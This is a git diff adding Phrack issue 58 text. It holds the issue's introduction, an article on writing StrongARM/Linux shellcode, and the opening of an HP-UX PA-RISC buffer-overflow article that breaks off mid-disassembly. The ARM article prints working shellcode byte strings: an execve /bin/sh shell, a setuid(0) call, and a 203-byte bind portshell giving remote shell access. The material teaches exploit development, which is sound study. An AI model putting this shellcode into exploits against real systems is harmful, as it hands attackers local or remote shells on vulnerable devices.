+    \ `-.:.     `\                                          /'     .:.-' /
+     `-.__ `\=====|                                        |=====/'__.-'
+        /=`'/   ^_\   //==// //  // //==// //||  //=  //   /_^   \'`=\
+      .'   /\   .=)  //==// //==// //==// //=|| //   //=//  (=.   /\   '.
+   .-'  .'|  '-(/_| //     //  // // ||  //  || \\= // ||   |_\)-'  |'.  '_.
+ .'  __(  \  .'`                                               `'.  /  )__  '.
+/_.'`  `.  |`                                                     `|  .'  `'._\
+    jgs  \ |                                                       | /
+         |/                                                         \|
+
+
++++ *Weep Weep Weep* Skybird, this is Dropkick with a red dash alpha message
++++ in two parts. -Break, break. Red dash alpha.
++++ Romeo-Oscar-November-Charlie-Tango-Tango-Lima-Alpha
++++ Authentication two-two-zero-zero-four-zero-delta-lime.
+
+I have a valid message. Stand by
+to authenticate.                       I agree with authentication also, sir.
+                                       Entering launch code: DLG-2209-TVX
+Launch code confirmed.
+                                       Holy shit!
+All right lets do it. Enable missiles. Target selection............. complete.
+                                       Time on target selection..... complete.
+                                       Yield selection.............. complete.
+I need to get someone at the phone.    Number one enabled, two, three, four,
+SAC. Try SAW HQ on the HF.             five, ..ten. All missiles enabled.
+                                       That's not the correct procedure.
+Screw the procedure. I want somebody
+on the goddamn phone before I kill
+20 million                             SIR. We have a launch order. Put your
+                                       hand on the key, sir!
+I'm sorry. I'm so sorry.               SIR! We are at launch - TURN
+                                       YOUR KEY, sir!
+                                                               (c) Wargames
+
+|=[ Table of Contents ]=-------------------------------------------------=|
+0x01 Introduction                                      Phrack Staff 0x08 kb
+0x02 Loopback                                          Phrack Staff 0x0b kb
+0x03 Signalnoise                                       Phrack Staff 0x18 kb
+0x04 Advanced return-into-lib(c) exploits (PaX case study)   nergal 0x48 kb
+0x05 Runtime binary encryption                         grugq & scut 0x61 kb
+0x06 Advances in kernel hacking                             palmers 0x1d kb
+0x07 Linux on-the-fly kernel patching without LKM        sd & devik 0x95 kb
+0x08 Linux x86 kernel function hooking emulation             mayhem 0x1a kb
+0x09 RPC without borders                                    stealth 0x10 kb
+0x0a Developing StrongARM/Linux shellcode                   funkysh 0x11 kb
+0x0b HP-UX (PA-RISC 1.1) Overflows                          zhodiac 0x16 kb
+0x0c The Security of Vita Vuova's Inferno OS                  dalai 0x11 kb
+0x0d Phrack World News                                 Phrack Staff 0x0c kb
+0x0e Phrack magazine extraction utility                Phrack Staff 0x15 kb
+|=-----------------------------------------------------------------------=|
+
+  This phrack issue, as well as the last two, comes without a prophile.
+This situation will not change unless we find someone who is worth a
+prophile.
+
+  The latest and all previous phrack issues are available online at
+http://www.phrack.org. Readers without web access can subscribe to the
+phrack-distrib mailinglist. Every new phrack is sent as email attachment
+to this list - shouts to the monkeys at nasa.gov who complained about
+their network situation (email only) but did not want to miss the latest
+phrack. A new phrack issue (without the attachment) is announced on
+the announcement mailinglist.
+
+To subscribe to the announcement mailinglist:
+$ mail announcement-subscribe@lists.phrack.org < /dev/null
+
+To subscribe to the distribution mailinglist:
+$ mail distrib-subscribe@lists.phrack.org < /dev/null
+
+To retrieve older issues (must subscribe first):
+$ mail distrib-index@lists.phrack.org < /dev/null
+$ mail distrib-get.<n>@lists.phrack.org < /dev/null
+where n indicated the phrack issue [1..58].
+
+Enjoy the magazine!
+
+
+Phrack Magazine Volume 10 Number 58, December 27, 2001.  ISSN 1068-1035
+Contents Copyright (c) 2001 Phrack Magazine.  All Rights Reserved.
+Nothing may be reproduced in whole or in part without written permission
+from the editors.
+Phrack Magazine is made available to the public, as often as possible, free
+of charge.
+
+|=-----------=[ C O N T A C T   P H R A C K   M A G A Z I N E ]=---------=|
+
+Editors           : phrackstaff@phrack.org
+Submissions       : phrackstaff@phrack.org
+Commentary        : loopback@phrack.org
+Phrack World News : disorder@phrack.org
+
+  We have some agressive /dev/null-style mail filter running. We do reply
+to every serious email. If you did not get a reply, then your mail was 
+probably not worth an answer or was caught by our mailfilter. Make sure 
+your mail has a non-implicit destination, one recipient, a non-empty 
+subject field, and does not contain any html code and is 100% 7bit clean
+pure ascii.
+
+|=-----------------------------------------------------------------------=|
+
+Submissions may be encrypted with the following PGP key:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v1.0.5 (GNU/Linux)
+Comment: For info see http://www.gnupg.org
+
+mQGiBDr0dzURBAC0nXC8TlrGLzTrXBcOq0NP7V3TKp/HUXghV1uhsJLzgXL1N2ad
+XF7yKFoP0RyvC3O4SVhSjFtaJZgwczkkRwgpabOddk77fnCENPvl2n0pWmyZuSQa
+fTEn+P8gmKEeyWXo3EDURgV5OM6m/zVvsQGxkP3/jjGES6eaELXRqqNM9wCgrzkS
+c0a4bJ03ETjcQa8qp3XIuLsD/04nseebHrqgLHZ/1s1gF6wdRFYGlOYY1tvkcIU4
+BRqgJZQu1DIauTEZiLBug+SdRyhJlYPhXWLXr3r7cq3TdxTD1DmM97V8CigA1H5Y
+g7UB0L5ZygL2ezRxMNxyBxPNDRj3VY3niMg/DafqFs4PXSeL/N4/xU45UBeyk7La
+QK2dA/4/FKBpUjXGB83s0omQ9sPHYquTiS51wze3SLpJs0jLnaIUmJ1ayBZqr0xT
+0LPQp72swGcDb5xvaNzNl2rPRKQZyrsDDX8xZdXSw1SrS6xogt83RWS6gbMQ7/Hr
+4AF917ElafjEp4wwd/rekD84RPumRmz4I02FN0xR5VV6K1rbILQkcGhyYWNrc3Rh
+ZmYgPHBocmFja3N0YWZmQHBocmFjay5vcmc+iF0EExECAB0FAjr0dzUFCThkCQAF
+CwcKAwQDFQMCAxYCAQIXgAAKCRDT4MJPPu7c4etbAJ9P/6NeGwx/nyBBTVpMweCQ
+6kFNkQCgnBLX1cmZ7DSg814YjZBFdLczcFS5Ag0EOvR3URAIAOumUGdn+NCs+Ue1
+d1RDCNHg6I8GEeH5DElGWC8jSMor2DOgah31VEcoPgVmtEdL8ZD/tl97vxcEhntA
+ttlELWVJV854kWxRMeCFbBS+fjcQpHCig5WjFzuOrdwBHlNZK2xWCpbV770eSPb/
++z9nosdP8WzmVnJ0JVoIc99JJf3d6YfJuscebB7xn6vJ3hZWM9kqMSyXaG1K3708
+gSfhTr1n9Hs7nDfKMMQ73Svbe6J3kZJNdX0cqZJLHfeiiUrtf0ZCVG52AxfLaWfm
+uPoIpZaJFzexJL/TL9gsRRvVdILd3SmVKtt2koaHNmUgFRVttol3bF8VTiGWb2uX
+S6WjbwcAAwUH/R9Fsk1Vf04qnzZ21DTsjwlA76cOje0Tme1VIYfwE33f3SkFo89+
+jYPFCMNObvSs/JVrstzzZr/c36a4rwi93Mxn7Tg5iT2QEBdDomLb3plpbF3r3OF3
+HcuXYuzNUubiA5J2nf3Rf0DdUVwWmOx8gnqF/QUrKRO+fzomT/jVaAYkVovMBE9o
+csA6t6/vF+SQ5dxPq+6lTJzFY5aK90p1TGHA+2K18yCkcivPEo7b/qu+n9vCOYHM
+WM+cp49bcUMExRkL934O1KUhHxbL96yBRWRzrJaC7ybGjC9hFAQ/wuXzaHOXEHd4
+PqrTZI/rvnRcVJ1CXVt9UfsLXUROaEAtAOOITAQYEQIADAUCOvR3UQUJOGQJAAAK
+CRDT4MJPPu7c4eksAJ9w/y+n6CHeqeUgKCYZ+EKvNWC30gCfYblC4sGwllhPufgT
+gPaxlvAXKrM=
+=p9fB
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+phrack:~# head -20 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of
+ *  the editors and contributors, truthful and accurate.  When possible,
+ *  all facts are checked, all code is compiled.  However, we are not
+ *  omniscient (hell, we don't even get paid).  It is entirely possible
+ *  something contained within this publication is incorrect in some way.
+ *  If this is the case, please drop us some email so that we can correct
+ *  it in a future issue.
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for
+ *  the entirely stupid (or illegal) things people may do with the
+ *  information contained herein.  Phrack is a compendium of knowledge,
+ *  wisdom, wit, and sass.  We neither advocate, condone nor participate
+ *  in any sort of illicit behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in
+ *  the articles of Phrack Magazine are intellectual property of their
+ *  authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack58/10.txt b/phrack58/10.txt
new file mode 100644
index 0000000..fc40b78
--- /dev/null
+++ b/phrack58/10.txt
@@ -0,0 +1,491 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3a, Phile #0x0a of 0x0e
+
+|=--------------=[ Developing StrongARM/Linux shellcode ]=---------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------=[ funkysh <funkysh@sm.pl> ]=----------------------=|
+
+
+                             "Into my ARMs"
+
+
+---[  Introduction
+
+
+  This paper covers informations needed to write StrongARM Linux shellcode.
+All examples presented in this paper was developed on Compaq iPAQ H3650
+with Intel StrongARM-1110 processor running Debian Linux. Note that this
+document is not a complete ARM architecture guide nor an assembly 
+language tutorial, while I hope it also does not contain any major bugs,
+it is perhaps worth noting that StrongARM can be not fully compatible
+with other ARMs (however, I often refer just to "ARM" when I think it is
+not an issue). Document is divided into nine sections:
+
+  * Brief history of ARM
+  * ARM architecture
+  * ARM registers
+  * Instruction set
+  * System calls
+  * Common operations
+  * Null avoiding
+  * Example codes
+  * References
+
+
+
+---[  Brief history of ARM
+
+
+  First ARM processor (ARM stands for Advanced RISC Machine) was designed
+and manufactured by Acorn Computer Group in the middle of 80's. 
+Since beginning goal was to construct low cost processor with low power 
+consumption, high performance and power efficiency. In 1990 Acorn 
+together with Apple Computer set up a new company Advanced RISC Machines
+Ltd. Nowadays ARM Ltd does not make processors only designs them and
+licenses the design to third party manufacturers. ARM technology is 
+currently licensed by number of huge companies including Lucent, 3Com,
+HP, IBM, Sony and many others.  
+
+  StrongARM is a result of ARM Ltd and Digital work on design that use the
+instruction set of the ARM processors, but which is built with the chip 
+technology of the Alpha series. Digital sold off its chip manufacturing
+to Intel Corporation. Intel's StrongARM (including SA-110 and SA-1110) 
+implements the ARM v4 architecture defined in [1].
+
+
+
+---[  ARM architecture
+         
+
+  The ARM is a 32-bit microprocessor designed in RISC architecture, that
+means it has reduced instruction set in opposite to typical CISC like 
+x86 or m68k. Advantages of reduced instruction set includes possibility 
+of optimising speed using for example pipelining or hard-wired logic. 
+Also instructions and addressing modes can made identical for most 
+instructions. ARM is a load/store architecture where data-processing 
+operations only operate on register contents, not directly on memory 
+contents. It is also supporting additional features like Load and Store
+Multiple instructions and conditional execution of all instructions.
+Obviously every instruction has the same length of 32 bits.
+
+
+---[  ARM registers
+
+
+  ARM has 16 visible 32 bit registers: r0 to r14 and r15 (pc). To simplify
+the thing we can say there is 13 'general-purpose' registers - r0 to r12
+(registers from r0 to r7 are unbanked registers which means they refers 
+to the same 32-bit physical register in all processor modes, they have
+no special use and can be used freely wherever an general-purpose 
+register is allowed in instruction) and three registers reserved for 
+'special' purposes (in fact all 15 registers are general-purpose):
+    
+   r13 (sp)     -  stack pointer
+   r14 (lr)     -  link register
+   r15 (pc/psr) -  program counter/status register
+
+  Register r13 also known as 'sp' is used as stack pointer and both with 
+link register are used to implement functions or subroutines in ARM
+assembly language. The link register - r14 also known as 'lr' is used to 
+hold subroutine return address. When a subroutine call is performed by
+eg. bl instruction r14 is set to return address of subroutine. Then
+subroutine return is performed by copying r14 back into program counter.
+
+  Stack on the ARM grows to the lower memory addresses and stack pointer
+points to the last item written to it, it is called "full descending
+stack".  For example result of placing 0x41 and then 0x42 on the stack
+looks that way:
+
+      memory address   stack value 
+
+                      +------------+
+          0xbffffdfc: | 0x00000041 |
+                      +------------+
+   sp ->  0xbffffdf8: | 0x00000042 |
+                      +------------+
+
+
+---[  Instruction set
+
+
+  As written above ARM like most others RISC CPUs has fixed-length (in this
+case 32 bits wide) instructions. It was also mentioned that all
+instructions can be conditional, so in bit representation top 4 bits (31-28)
+are used to specify condition under which the instruction is executed.
+
+Instruction interesting for us can be devided into four classes:
+
+  - branch instructions,  
+  - load and store instructions,
+  - data-processing instructions,
+  - exception-generating instructions,
+
+Status register transfer and coprocessor instructions are ommitted here.
+
+
+ 1. Branch instructions
+    -------------------
+
+ There are two branch instructions: 
+
+               branch:  b <24 bit signed offset>
+ 
+     branch with link:  bl <24 bit signed offset>
+ 
+
+Executing 'branch with link' - as mentioned in previous section, results
+with setting 'lr' with address of next instruction.
+
+
+ 2. Data-processing instructions
+    ----------------------------
+
+Data-processing instructions in general uses 3-address format:
+ 
+ <opcode mnemonic> <destination> <operand 1> <operand 2>
+
+Destination is always register, operand 1 also must be one of r0 to r15
+registers, and operand 2 can be register, shifted register or immediate
+value.
+
+ Some examples:
+
+  -----------------------------+----------------+--------------------+
+              addition:   add  | add r1,r1,#65  | set r1 = r1 + 65   |
+          substraction:   sub  | sub r1,r1,#65  | set r1 = r1 - 65   |
+           logical AND:   and  | and r0,r1,r2   | set r0 = r1 AND r2 |
+  logical exclusive OR:   eor  | eor r0,r1,#65  | set r0 = r1 XOR r2 |
+            logical OR:   orr  | orr r0,r1,r2   | set r0 = r1 OR r2  |
+                  move:   mov  | mov r2,r0      | set r2 = r0        |
+
+
+ 3. Load and store instructions
+    ---------------------------
+
+   
+ load register from memory:  ldr rX, <address>    
+ 
+  Example: ldr r0, [r1] load r0 with 32 bit word from address specified 
+in r1, there is also ldrb instruction responsible for loading 8 bits,
+and analogical instructions for storing registers in memory:
+                    
+  store register in memory:  str rX, <address>     (store 32 bits)
+                             strb rX, <address>    (store 8 bits)
+
+  ARM support also storing/loading of multiple registers, it is quite 
+interesting feature from optimization point of view, here go stm (store
+multiple registers in memory):
+
+ stm <base register><stack type>(!),{register list}
+ 
+  Base register can by any register, but typically stack pointer is used.
+For example: stmfd sp!, {r0-r3, r6} store registers r0, r1, r2, r3 and 
+r6 on the stack (in full descending mode - notice additional mnemonic 
+"fd" after stm) stack pointer will points to the place where r0 register
+is stored.
+
+Analogical instruction to load of multiple registers from memory is: ldm
+
+
+ 4. Exception-generating instructions 
+    ---------------------------------
+
+Software interrupt: swi <number> is only interesting for us, it perform
+software interrupt exception, it is used as system call.
+
+
+List of instructions presented in this section is not complete, a full 
+set can be obtained from [1].
+
+
+
+---[  Syscalls
+
+
+  On Linux with StrongARM processor, syscall base is moved to 0x900000,
+this is not good information for shellcode writers, since we have to deal
+with instruction opcode containing zero byte.
+
+Example "exit" syscall looks that way:
+
+               swi 0x900001   [ 0xef900001 ]
+
+Here goes a quick list of syscalls which can be usable when writing 
+shellcodes (return value of the syscall is usually stored in r0): 
+
+
+       execve:
+       ------- 
+               r0 = const char *filename
+               r1 = char *const argv[]
+               r2 = char *const envp[]
+      call number = 0x90000b
+ 
+
+       setuid:
+       ------- 
+               r0 = uid_t uid
+      call number = 0x900017
+
+
+         dup2:
+         ----- 
+               r0 = int oldfd
+               r1 = int newfd
+      call number = 0x90003f
+
+
+       socket:
+       ------- 
+               r0 = 1 (SYS_SOCKET)
+               r1 = ptr to int domain, int type, int protocol
+      call number = 0x900066 (socketcall)
+
+
+         bind:
+         ----- 
+               r0 = 2 (SYS_BIND)
+               r1 = ptr to int  sockfd, struct sockaddr *my_addr, 
+                    socklen_t addrlen
+      call number = 0x900066 (socketcall)
+
+
+       listen:
+       ------- 
+               r0 = 4 (SYS_LISTEN)
+               r1 = ptr to int s, int backlog
+      call number = 0x900066 (socketcall)
+
+
+       accept:
+       ------- 
+               r0 = 5 (SYS_ACCEPT)
+               r1 = ptr int s,  struct  sockaddr  *addr,
+                    socklen_t *addrlen 
+      call number = 0x900066 (socketcall)
+
+
+
+---[  Common operations 
+
+ 
+ Loading high values 
+ -------------------
+
+  Because all instructions on the ARM occupies 32 bit word including place
+for opcode, condition and register numbers, there is no way for loading
+immediate high value into register in one instruction. This problem can
+be solved by feature called 'shifting'. ARM assembler use six additional 
+mnemonics reponsible for the six different shift types:
+
+           lsl -  logical shift left
+           asl -  arithmetic shift left
+           lsr -  logical shift right
+           asr -  arithmetic shift right
+           ror -  rotate right
+           rrx -  rotate right with extend
+
+  Shifters can be used with the data processing instructions, or with ldr
+and str instruction. For example, to load r0 with 0x900000 we perform 
+following operations:
+ 
+         mov   r0, #144           ; 0x90
+         mov   r0, r0, lsl #16    ; 0x90 << 16 = 0x900000
+
+
+ Position independence
+ ---------------------
+
+  Obtaining own code postition is quite easy since pc is general-purpose
+register and can be either readed at any moment or loaded with 32 bit
+value to perform jump into any address in memory. 
+
+For example, after executing:
+
+         sub   r0, pc, #4
+
+address of next instruction will be stored in register r0.
+
+Another method is executing branch with link instruction:
+    
+         bl    sss
+         swi   0x900001
+  sss:   mov   r0, lr
+  
+Now r0 points to "swi 0x900001".
+
+ 
+ Loops
+ -----
+
+  Let's say we want to construct loop to execute some instruction three 
+times. Typical loop will be constructed this way:
+
+         mov   r0, #3     <- loop counter
+ loop:   ...    
+         sub   r0, r0, #1 <- fd = fd -1 
+         cmp   r0, #0     <- check if r0 == 0 already
+         bne   loop       <- goto loop if no (if Z flag != 1)
+
+This loop can be optimised using subs instruction which will set Z flag
+for us when r0 reach 0, so we can eliminate a cmp.
+
+ 
+         mov   r0, #3
+ loop:   ...
+         subs  r0, r0, #1
+         bne   loop
+
+
+      
+ Nop instruction
+ ---------------
+
+  On ARM "mov r0, r0" is used as nop, however it contain nulls so any other
+"neutral" instruction have to be used when writting proof of concept codes
+for vulnerabilities, "mov r1, r1" is just an example.
+
+         mov   r1, r1    [ 0xe1a01001 ]
+          
+
+---[  Null avoiding
+
+
+  Almost any instruction which use r0 register generates 'zero' on ARM,
+this can be usually solved by replacing it with other instruction or
+using self-modifing code.
+
+ For example: 
+             e3a00041    mov   r0, #65      can be raplaced with:
+   
+             e0411001    sub   r1, r1, r1
+             e2812041    add   r2, r1, #65
+             e1a00112    mov   r0, r2, lsl r1  (r0 = r2 << 0)
+
+ Syscall can be patched in following way:
+
+             e28f1004    add   r1, pc, #4    <- get address of swi
+             e0422002    sub   r2, r2, r2    
+             e5c12001    strb  r2, [r1, #1]  <- patch 0xff with 0x00
+             ef90ff0b    swi   0x90ff0b      <- crippled syscall
+ 
+ Store/Load multiple also generates 'zero', even if r0 register is not
+ used:
+ 
+             e92d001e    stmfd sp!, {r1, r2, r3, r4}
+ 
+ In example codes presented in next section I used storing with link
+ register:
+
+             e04ee00e    sub   lr, lr, lr
+             e92d401e    stmfd sp!, {r1, r2, r3, r4, lr}
+
+
+---[  Example codes
+
+
+/*
+ * 47 byte StrongARM/Linux execve() shellcode
+ * funkysh
+ */
+
+char shellcode[]= "\x02\x20\x42\xe0"   /*  sub   r2, r2, r2            */
+                  "\x1c\x30\x8f\xe2"   /*  add   r3, pc, #28 (0x1c)    */
+                  "\x04\x30\x8d\xe5"   /*  str   r3, [sp, #4]          */
+                  "\x08\x20\x8d\xe5"   /*  str   r2, [sp, #8]          */
+                  "\x13\x02\xa0\xe1"   /*  mov   r0, r3, lsl r2        */
+                  "\x07\x20\xc3\xe5"   /*  strb  r2, [r3, #7           */
+                  "\x04\x30\x8f\xe2"   /*  add   r3, pc, #4            */
+                  "\x04\x10\x8d\xe2"   /*  add   r1, sp, #4            */
+                  "\x01\x20\xc3\xe5"   /*  strb  r2, [r3, #1]          */
+                  "\x0b\x0b\x90\xef"   /*  swi   0x90ff0b              */
+                  "/bin/sh";
+
+
+/*
+ * 20 byte StrongARM/Linux setuid() shellcode
+ * funkysh
+ */
+
+char shellcode[]= "\x02\x20\x42\xe0"   /*  sub   r2, r2, r2            */
+                  "\x04\x10\x8f\xe2"   /*  add   r1, pc, #4            */
+                  "\x12\x02\xa0\xe1"   /*  mov   r0, r2, lsl r2        */
+                  "\x01\x20\xc1\xe5"   /*  strb  r2, [r1, #1]          */
+                  "\x17\x0b\x90\xef";  /*  swi   0x90ff17              */
+
+
+/*
+ * 203 byte StrongARM/Linux bind() portshell shellcode
+ * funkysh
+ */
+
+char shellcode[]= "\x20\x60\x8f\xe2"   /*  add   r6, pc, #32           */
+                  "\x07\x70\x47\xe0"   /*  sub   r7, r7, r7            */
+                  "\x01\x70\xc6\xe5"   /*  strb  r7, [r6, #1]          */
+                  "\x01\x30\x87\xe2"   /*  add   r3, r7, #1            */
+                  "\x13\x07\xa0\xe1"   /*  mov   r0, r3, lsl r7        */
+                  "\x01\x20\x83\xe2"   /*  add   r2, r3, #1            */
+                  "\x07\x40\xa0\xe1"   /*  mov   r4, r7                */
+                  "\x0e\xe0\x4e\xe0"   /*  sub   lr, lr, lr            */
+                  "\x1c\x40\x2d\xe9"   /*  stmfd sp!, {r2-r4, lr}      */
+                  "\x0d\x10\xa0\xe1"   /*  mov   r1, sp                */
+                  "\x66\xff\x90\xef"   /*  swi   0x90ff66     (socket) */
+                  "\x10\x57\xa0\xe1"   /*  mov   r5, r0, lsl r7        */
+                  "\x35\x70\xc6\xe5"   /*  strb  r7, [r6, #53]         */
+                  "\x14\x20\xa0\xe3"   /*  mov   r2, #20               */
+                  "\x82\x28\xa9\xe1"   /*  mov   r2, r2, lsl #17       */
+                  "\x02\x20\x82\xe2"   /*  add   r2, r2, #2            */
+                  "\x14\x40\x2d\xe9"   /*  stmfd sp!, {r2,r4, lr}      */
+                  "\x10\x30\xa0\xe3"   /*  mov   r3, #16               */
+                  "\x0d\x20\xa0\xe1"   /*  mov   r2, sp                */
+                  "\x0d\x40\x2d\xe9"   /*  stmfd sp!, {r0, r2, r3, lr} */
+                  "\x02\x20\xa0\xe3"   /*  mov   r2, #2                */
+                  "\x12\x07\xa0\xe1"   /*  mov   r0, r2, lsl r7        */
+                  "\x0d\x10\xa0\xe1"   /*  mov   r1, sp                */
+                  "\x66\xff\x90\xef"   /*  swi   0x90ff66       (bind) */
+                  "\x45\x70\xc6\xe5"   /*  strb  r7, [r6, #69]         */
+                  "\x02\x20\x82\xe2"   /*  add   r2, r2, #2            */
+                  "\x12\x07\xa0\xe1"   /*  mov   r0, r2, lsl r7        */
+                  "\x66\xff\x90\xef"   /*  swi   0x90ff66     (listen) */
+                  "\x5d\x70\xc6\xe5"   /*  strb  r7, [r6, #93]         */
+                  "\x01\x20\x82\xe2"   /*  add   r2, r2, #1            */
+                  "\x12\x07\xa0\xe1"   /*  mov   r0, r2, lsl r7        */
+                  "\x04\x70\x8d\xe5"   /*  str   r7, [sp, #4]          */
+                  "\x08\x70\x8d\xe5"   /*  str	 r7, [sp, #8]          */
+                  "\x66\xff\x90\xef"   /*  swi   0x90ff66     (accept) */
+                  "\x10\x57\xa0\xe1"   /*  mov   r5, r0, lsl r7        */
+                  "\x02\x10\xa0\xe3"   /*  mov   r1, #2                */
+                  "\x71\x70\xc6\xe5"   /*  strb  r7, [r6, #113]        */
+                  "\x15\x07\xa0\xe1"   /*  mov   r0, r5, lsl r7 <dup2> */
+                  "\x3f\xff\x90\xef"   /*  swi   0x90ff3f       (dup2) */
+                  "\x01\x10\x51\xe2"   /*  subs  r1, r1, #1            */
+                  "\xfb\xff\xff\x5a"   /*  bpl   <dup2>                */
+                  "\x99\x70\xc6\xe5"   /*  strb  r7, [r6, #153]        */
+                  "\x14\x30\x8f\xe2"   /*  add   r3, pc, #20           */
+                  "\x04\x30\x8d\xe5"   /*  str	 r3, [sp, #4]          */
+                  "\x04\x10\x8d\xe2"   /*  add   r1, sp, #4            */
+                  "\x02\x20\x42\xe0"   /*  sub   r2, r2, r2            */
+                  "\x13\x02\xa0\xe1"   /*  mov   r0, r3, lsl r2        */
+                  "\x08\x20\x8d\xe5"   /*  str   r2, [sp, #8]          */
+                  "\x0b\xff\x90\xef"   /*  swi	 0x900ff0b    (execve) */
+                  "/bin/sh";
+
+
+---[  References:
+
+
+[1] ARM Architecture Reference Manual - Issue D, 
+    2000 Advanced RISC Machines LTD
+
+[2] Intel StrongARM SA-1110 Microprocessor Developer's Manual,
+    2001 Intel Corporation
+
+[3] Using the ARM Assembler,
+    1988 Advanced RISC Machines LTD
+    
+[4] ARM8 Data Sheet,
+    1996 Advanced RISC Machines LTD
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack58/11.txt b/phrack58/11.txt
new file mode 100644
index 0000000..6140a51
--- /dev/null
+++ b/phrack58/11.txt
@@ -0,0 +1,648 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3a, Phile #0x0b of 0x0e
+
+|=-----------------=[ HP-UX (PA-RISC 1.1) Overflows ]=-------------------=|
+|=-----------------------------------------------------------------------=|
+|=----------------=[ Zhodiac  <zhodiac@softhome.net> ]=------------------=|
+
+
+--[ Introduction.
+
+
+  Damn it, another buffer overflow document!! Well, this paper is not
+intended to explain buffer overflow exploitations, neither is intended to
+explain asm coding. This paper focuses mainly in three topics: 
+
+  HP-UX/PA-RISC registers and stack organization, a solution for abo2.c
+(located at community.core-sdi.org/~gera/InsecureProgramming/) and finally
+two shellcodes for this OS/arch.
+
+  It covers basic topics to start exploiting buffer overflows under
+HP-UX/PA-RISC 1.1. This paper is divided into the following sections:
+
+
+  1. PA-RISC Introduction
+    1.1. RISC fundamentals
+    1.2. Registers
+    1.3. Leaf and non-leaf functions
+  2. Stack organization
+  3. Advance Buffer Overflow #2
+  4. Extras
+    4.1. Local Shellcode
+    4.2. Remote Shellcode
+  5. Resources
+  6. Greetings
+
+
+--[ 1. PA-RISC Introduction
+
+--[ 1.1. RISC fundamentals
+
+  RISC (Reduced Instruction Set Computing) refers to procesors with a
+reduced instruction set, and with the ability to do the same tasks of a
+CISC processor (Complex Instruction Set Computing).
+
+RISC processors have some common caracteristics:
+
+  - Load, store design for memory access
+  - Reduce number of addressing
+  - Instruction size is always the same (Speeds up)  
+  - Few instructions format
+  - More use of registers rather than memory
+
+Deep in PA-RISC arch we have some more defined caracteristics:
+
+  - Immediate addressing, base relative without offset
+  - Predecrement in an instruction
+  - Postincrement in an instruction
+  - 12 instruction formats, all of them have 32 bits
+
+
+--[ 1.2. Registers
+
+On PA-RISC 1.1 there are four types of registers:
+
+  - General registers (32)
+  - Float point registers (32)
+  - Space registers (8)
+  - Control registers (25)
+
+	
+  We will focus on the "General registers" which are the ones that get
+involved in shellcodes programming and buffer overflow exploiting. These
+registers can be used at any time even when cpu is not on privilege state,
+except %gr0 (%r0) as we will see.
+
+Lets explain some uses of the general registers	
+ 
+  - %gr0: Always contains the value 0 and if you write something on it, 
+          will be discarded
+  - %gr1: It is the implicit target register of the ADDIL instruction.
+          When calling a shared library function it will store the return 
+          address of the so called "shared library stub" before calling 
+          the function
+  - %gr2 (%rp): In this register it is stored the return address when a 
+          function call is done with BL (Branch and Link)
+  - %gr3-%gr21: General use registers
+  - %gr19: Is the linkage table base register when calling a shared 
+          library function
+  - %gr22: Stores the syscall number when you are going to call one of 
+          them
+  - %gr23-gr26: Stores the functions arguments arg0-arg3
+  - %gr28,gr29 (%ret0, %ret1): In %gr28 is stored the return value of a 
+          function or syscall. (An inmediat value or a reference address). 
+          Under certain circunstances the value is sotred in %gr29
+  - %gr30: Here it is sotred the current Stack pointer. It has to be  
+          aligned to 16 bits
+  - %gr31: Under PA-RISC 2.0 it contains the return address when a BLE 
+          instruction is executed
+
+Some final notes:
+
+  - Under PA-RISC 1.0 there are only 16 Floating-Point registers and under   
+    PA-RISC 1.1 and 2.0 there are 32
+  - Control registers are only accessible when the CPU is in privilege mode
+  - Under PA-RISC 2.0 registers size is 64 bits
+
+
+--[ 1.3. Leaf and non-leaf functions
+
+There are mainly two classes of functions under HP-UX (similar as SPARC):
+
+  - Leaf functions: They DO NOT call any further function.
+
+  Leaf funtions, since they do not call any further function never store
+%rp in memory because it will never be overwritting by a new function
+called. 
+
+Here is an example on code and its gdb disass dump of a leaf function.
+
+HP9000:~/overflows/leaf$ cat leaf.c 
+
+int leaf(char *buff) {
+  int a=0;
+  a=1;
+}
+
+int main(int argc, char **argv) {
+  leaf(argv[1]);
+}
+
+HP9000:~/overflows/leaf$
+
+You can see in the gdb disass dump it never saves %rp in stack.
+
+(gdb) disass leaf
+Dump of assembler code for function foo:
+0x3280 <leaf>:           copy r3,r1
+0x3284 <leaf+4>:         copy sp,r3
+0x3288 <leaf+8>:         stw,ma r1,40(sr0,sp)
+0x328c <leaf+12>:        stw r26,-24(sr0,r3)
+0x3290 <leaf+16>:        stw  r0,8(sr0,r3)
+0x3294 <leaf+20>:        ldi 1,r19
+0x3298 <leaf+24>:        stw  r19,8(sr0,r3)
+0x329c <leaf+28>:        ldo 40(r3),sp
+0x32a0 <leaf+32>:        ldw,mb -40(sr0,sp),r3
+0x32a4 <leaf+36>:        bv,n r0(rp)
+End of assembler dump.
+(gdb)
+
+
+  - Non-Leaf funtions: They DO call at least one function.
+
+  Non-Leaf funtions, since they do not call any further function always
+stores %rp in stack (as we will see) because the function called is going
+to overwrite %rp with its wn return pointer.
+
+Here is an example on code and its gdb disass dump of a leaf funtion.
+
+HP9000:~/overflows/non-leaf$ cat non-leaf.c
+  
+int non_leaf(char *buff) {
+  int a=0;
+  a=1;
+  sleep(1);
+}
+
+int main(int argc, char **argv) {
+  non_leaf(argv[1]);
+}
+
+HP9000:~/overflows/non-leaf$
+
+You can see in the gdb disass dump it saves %rp in stack at
+"stw rp,-14(sr0,sp)".
+
+(gdb) disass non_leaf
+Dump of assembler code for function foo:
+0x32b0 <non_leaf>:           stw rp,-14(sr0,sp)
+0x32b4 <non_leaf+4>:         copy r3,r1
+0x32b8 <non_leaf+8>:         copy sp,r3
+0x32bc <non_leaf+12>:        stw,ma r1,80(sr0,sp)
+0x32c0 <non_leaf+16>:        stw r26,-24(sr0,r3)
+0x32c4 <non_leaf+20>:        stw  r0,8(sr0,r3)
+0x32c8 <non_leaf+24>:        ldi 1,r19
